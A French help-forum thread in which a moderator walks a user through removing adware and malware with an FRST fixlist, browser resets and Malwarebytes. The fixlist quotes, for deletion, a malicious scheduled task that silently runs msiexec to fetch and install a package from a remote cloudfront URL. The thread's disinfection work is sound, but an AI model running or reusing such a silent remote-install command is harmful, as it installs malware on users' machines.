Sujet Précédent Sujet Suivant

Infection suite à un mauvais téléchargement

Résolu/Fermé
royalscalp Messages postés 338 Date d'inscription mercredi 21 mai 2008 Statut Membre Dernière intervention 14 juin 2017 - 11 mai 2017 à 15:57
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 - 17 mai 2017 à 12:38
Bonjour à tous,

J'ai laissé mon petit cousin s'occuper de l'installation d'un programme, aussi pour l'éduquer et lui montrer les bons geste pour éviter d'installer tout et surtout n'importe quoi...

Et bien j'ai pas été déçu : je reviens 30min plus tard et j'ai du arrêter l'installation en cours, qui décompressait plein de fichiers...

Bref, après un scan AdwCleaner, ça va un peu mieux mais Edge s'ouvre sur des sites analysés comme "sites d’hameçonnage".

Je vous poste ici les rapport après suppression des menaces :

https://pjjoint.malekal.com/files.php?id=20170511_y13p10p10w6w9

https://pjjoint.malekal.com/files.php?id=20170511_m8b7w8x8b14

Reste-t-il qqch à effectuer ?

Merci !
A voir également:

4 réponses

Réponse 1 / 4
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 659
11 mai 2017 à 15:59
Salut,


Réinitialise/Répare les navigateurs WEB concernés par les problèmes :

puis :

Suis le tutoriel FRST. ( prends le temps de lire attentivement - tout y est bien expliqué ).

Télécharge et lance le scan FRST, 3 rapports FRST seront générés :
  • FRST.txt
  • Shortcut.txt
  • Additionnal.txt


Envoie ces 3 rapports sur le site http://pjjoint.malekal.com/ et en retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.


0
royalscalp Messages postés 338 Date d'inscription mercredi 21 mai 2008 Statut Membre Dernière intervention 14 juin 2017 1
11 mai 2017 à 16:15
Salut Malekal_morte ! Merci à toi pour ta réactivité.

FRST.txt :

https://pjjoint.malekal.com/files.php?id=FRST_20170511_s5m14r6s8x12


Shortcut.txt :

https://pjjoint.malekal.com/files.php?id=20170511_l11r6y8d10b14


Addition.txt :

https://pjjoint.malekal.com/files.php?id=20170511_z14i10k8v5n14


Merci encore !
0
royalscalp Messages postés 338 Date d'inscription mercredi 21 mai 2008 Statut Membre Dernière intervention 14 juin 2017 1
11 mai 2017 à 16:44
up
0
Réponse 2 / 4
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 659
11 mai 2017 à 16:45
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.

Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit : 

CreateRestorePoint:
CloseProcesses:
HKU\S-1-5-21-757137247-1080961095-2304355738-1001\...\Run: [Q7CHOPYT7JHO1L4] => C:\Program Files\WNYLA3AHQ0\WNYLA3AHQ.exe [1205760 2017-05-11] (2DL8@MJC1)
HKU\S-1-5-21-757137247-1080961095-2304355738-1001\...\Run: [HAAVO77KKEL9IXF] => C:\Program Files\5FZIMF91HB\5FZIMF91H.exe [1205760 2017-05-11] (2DL8@MJC1)
HKU\S-1-5-21-757137247-1080961095-2304355738-1001\...\Run: [IU9JJQPLXEN12ZD] => "C:\Program Files (x86)\SpeeDownloader\VKVOP.exe" <===== ATTENTION
HKU\S-1-5-21-757137247-1080961095-2304355738-1001\...\Run: [AV96FRSXE6RYNWH] => C:\Program Files\7JM1FZRZMD\7JM1FZRZM.exe [1205760 2017-05-11] (2DL8@MJC1)
HKU\S-1-5-21-757137247-1080961095-2304355738-1001\...\Run: [KMKMYGZ2RDU8GB6] => C:\Program Files\ODL4YRUOUZ\ODL4YRUOU.exe [1205760 2017-05-11] (2DL8@MJC1)
HKLM\...\Providers\s06ycus6: C:\Program Files (x86)\Semogh Log\local64spl.dll [313856 2017-05-11] ()
ShellExecuteHooks: Pas de nom - {4EA8E362-3172-11E7-AE20-64006A5CFC23} - C:\Users\user\AppData\Roaming\Przuherderse\Thicole.dll [148480 2017-05-11] ()
HKU\S-1-5-21-757137247-1080961095-2304355738-1001\...\Run: [Chromium] => c:\users\user\appdata\local\chromium\application\chrome.exe [1043456 2016-01-26] (The Chromium Authors)
CHR Extension: (wanteeed) - C:\Users\user\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\emnoomldgleagdjapdeckpmebokijail [2017-04-28]
R2 tw255174390; C:\ProgramData\tw255174390.exe [940632 2017-05-11] (Olimp company)
2017-05-11 15:00 - 2017-05-11 15:44 - 00004344 _____ C:\ProgramData\log.ewbt
2017-05-11 15:00 - 2017-05-11 15:44 - 00000128 _____ C:\ProgramData\log.ewbb
2017-05-11 15:00 - 2017-05-11 15:00 - 00016836 _____ C:\WINDOWS\System32\Tasks\Tangulg Keyboard
2017-05-11 15:00 - 2017-05-11 15:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Soci2Sear Browser Enhancer
2017-05-11 15:00 - 2017-05-11 15:00 - 00000000 ____D C:\Program Files\9b4db0800fbd8b41ea32c1ee3e71289f
2017-05-11 14:59 - 2017-05-11 15:44 - 00624640 _____ C:\WINDOWS\system32\NetUtils2016.dll
2017-05-11 14:59 - 2017-05-11 15:05 - 00000000 ____D C:\Users\user\AppData\Roaming\320603
2017-05-11 14:59 - 2017-05-11 15:05 - 00000000 ____D C:\Users\user\AppData\Roaming\245367
2017-05-11 14:59 - 2017-05-11 15:04 - 00000000 ____D C:\Users\user\AppData\Roaming\722612
2017-05-11 14:59 - 2017-05-11 15:04 - 00000000 ____D C:\ProgramData\VideoMemoryDiagnostic
2017-05-11 14:59 - 2017-05-11 15:03 - 00000000 ____D C:\Program Files (x86)\gCzaZtt5CS
2017-05-11 14:59 - 2017-05-11 14:59 - 00907160 _____ C:\WINDOWS\system32\Drivers\NetUtils2016.sys
2017-05-11 14:59 - 2017-05-11 14:59 - 00140800 _____ C:\Users\user\AppData\Local\installer.dat
2017-05-11 14:59 - 2017-05-11 14:59 - 00011568 _____ C:\Users\user\AppData\Local\InstallationConfiguration.xml
2017-05-11 14:59 - 2017-05-11 14:59 - 00006096 _____ C:\WINDOWS\System32\Tasks\Semogh Log
2017-05-11 14:59 - 2017-05-11 14:59 - 00000000 ____D C:\WINDOWS\system32\sstmp
2017-05-11 14:59 - 2017-05-11 14:59 - 00000000 ____D C:\Users\user\AppData\Roaming\Przuherderse
2017-05-11 14:59 - 2017-05-11 14:59 - 00000000 ____D C:\Users\user\AppData\Roaming\devnull
2017-05-11 14:59 - 2017-05-11 14:59 - 00000000 ____D C:\Users\user\AppData\Local\CrashRpt
2017-05-11 14:59 - 2017-05-11 14:59 - 00000000 ____D C:\Program Files\ODL4YRUOUZ
2017-05-11 14:59 - 2017-05-11 14:59 - 00000000 ____D C:\Program Files\7JM1FZRZMD
2017-05-11 14:59 - 2017-05-11 14:59 - 00000000 ____D C:\Program Files\5FZIMF91HB
2017-05-11 14:59 - 2017-05-11 14:59 - 00000000 ____D C:\Program Files (x86)\Semogh Log
2017-05-11 14:58 - 2017-05-11 15:04 - 00000000 ____D C:\Users\user\AppData\Roaming\607197
2017-05-11 14:58 - 2017-05-11 14:59 - 00000000 ____D C:\Users\user\AppData\Local\Darerchlojesh
2017-05-11 14:58 - 2017-05-11 14:59 - 00000000 ____D C:\Program Files\WNYLA3AHQ0
2017-05-11 14:58 - 2017-05-11 14:59 - 00000000 ____D C:\Program Files (x86)\Vibshleberdom
2017-05-11 14:58 - 2017-05-11 14:58 - 00940632 _____ (Olimp company) C:\ProgramData\tw255174390.exe
2017-05-11 14:55 - 2017-05-11 14:55 - 01205780 _____ C:\Users\user\Downloads\file.zip
2017-05-11 14:55 - 2017-05-11 14:55 - 00000000 ____D C:\Users\user\Downloads\file
2017-05-11 14:54 - 2017-05-11 14:54 - 00000504 _____ C:\Users\user\Downloads\file.htm
2017-05-11 14:50 - 2017-05-11 14:50 - 00002842 _____ C:\WINDOWS\System32\Tasks\CCleanerSkipUAC
2017-05-11 14:50 - 2017-05-11 14:50 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2017-05-11 14:50 - 2017-05-11 14:50 - 00000000 ____D C:\Program Files\CCleaner
2017-05-09 16:59 - 2017-05-09 16:59 - 01548288 _____ C:\WINDOWS\016e4bc054bbdc69046887f10b4273a2.exe
2017-05-09 16:59 - 2017-05-09 16:59 - 00051619 _____ C:\WINDOWS\uninstaller.dat
2017-05-04 08:25 - 2017-05-04 08:25 - 00001079 _____ C:\Users\Public\Desktop\Traktor 2.lnk
2017-05-04 08:25 - 2017-05-04 08:25 - 00000000 __HDC C:\ProgramData\{92E8788D-7A29-418C-BEB9-B36CE02966C9}
2017-05-04 08:24 - 2017-05-04 08:24 - 00000000 __HDC C:\ProgramData\{90D8CE90-3E6B-4034-A281-BC9F19B60A5B}
2017-05-04 08:24 - 2017-05-04 08:24 - 00000000 __HDC C:\ProgramData\{42DEBD12-9D09-4B77-B434-2EF604E45D3D}
Task: {63C93D85-53DC-426C-B89A-36394973C2D4} - System32\Tasks\Tangulg Keyboard => Rundll32.exe "C:\Program Files\Tangulg Keyboard\Tangulg Keyboard.dll",BDXvsOBixXk
Task: {99809C82-6226-4AD3-8607-92F4F412FB55} - System32\Tasks\Microsoft\Windows\DeviceSettings\Reileckfevother => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=KINGSTONXRBU-SNS8100S3128GD_50026B7248042F64&d=20170511 /q <==== ATTENTION
Task: {4F6EF04E-33C7-4306-AF35-07E0CB3B5A37} - System32\Tasks\Microsoft\Windows\MemoryDiagnostic\VideoMemoryDiagnostic => C:\\ProgramData\\VideoMemoryDiagnostic\\vmdiag.exe 
C:\\ProgramData\\VideoMemoryDiagnostic
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:


Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.

Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.

Redémarre l'ordinateur.

2°)
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :


3°)
Termine par un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite

4°)
Vois ce que cela donne et si des améliorations ont eu lieu.
Si ce n'est pas le cas, s itu as encore des pages de pubs intempestives, précise sur quel navigateur WEB.


0
royalscalp Messages postés 338 Date d'inscription mercredi 21 mai 2008 Statut Membre Dernière intervention 14 juin 2017 1
Modifié le 15 mai 2017 à 05:09
Salut Salut !

Malheureusement le rapport FRST ne s'est pas affiché au redémarrage...

J'ai quand même fait la suppression des menaces après le dernier scan MBAM, dont voici le rapport : https://pjjoint.malekal.com/files.php?id=20170515_v12u14i5l9u5

Après Google Chrome freeze encore, avec ouverture de fenêtres intempestives aussi...
Du coup Obligé d'utiliser Edge.

J'espère que j'ai pas fait de mauvaise manip !

Merci encore !
0
Réponse 3 / 4
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 659
15 mai 2017 à 09:04
Réinstalle proprement Google Chrome, en suivant exactement cette procédure : Réparer et réinstaller proprement Google Chrome

Redonne les rapport FRST de scan pour voir ce qu'il reste.
0
royalscalp Messages postés 338 Date d'inscription mercredi 21 mai 2008 Statut Membre Dernière intervention 14 juin 2017 1
16 mai 2017 à 11:58
Google Chrome réinstallé !...

Rapports FRST :

FRST : https://pjjoint.malekal.com/files.php?id=20170516_v10k8m8i14u14

Addition : https://pjjoint.malekal.com/files.php?id=FRST_20170516_l12y6z12q15c11

Shortcut : https://pjjoint.malekal.com/files.php?id=20170516_x14e14j8f6e14

Voilà voilà ;)
0
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 659 > royalscalp Messages postés 338 Date d'inscription mercredi 21 mai 2008 Statut Membre Dernière intervention 14 juin 2017
16 mai 2017 à 13:20
il reste quel problème ?
0
royalscalp Messages postés 338 Date d'inscription mercredi 21 mai 2008 Statut Membre Dernière intervention 14 juin 2017 1 > Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020
17 mai 2017 à 11:43
Non, tout est revenu comme d'habitude ! :)
0
Réponse 4 / 4
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 659
17 mai 2017 à 12:38
ok :)

Supprime le dossier C:\FRST


Termine par un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite


Quelques conseils :

Pour ne plus te faire avoir.
A lire - Programmes parasites / PUPs : Dossier Adwares/PUPs : programmes indésirables et parasites
(Surtout active les détections LPIs pour détecter les programmes parasites et publicitaires)


0

Discussions similaires

Savoir de quel ville à été envoyé le message
pedro1209 -
Pierr10 -

7 réponses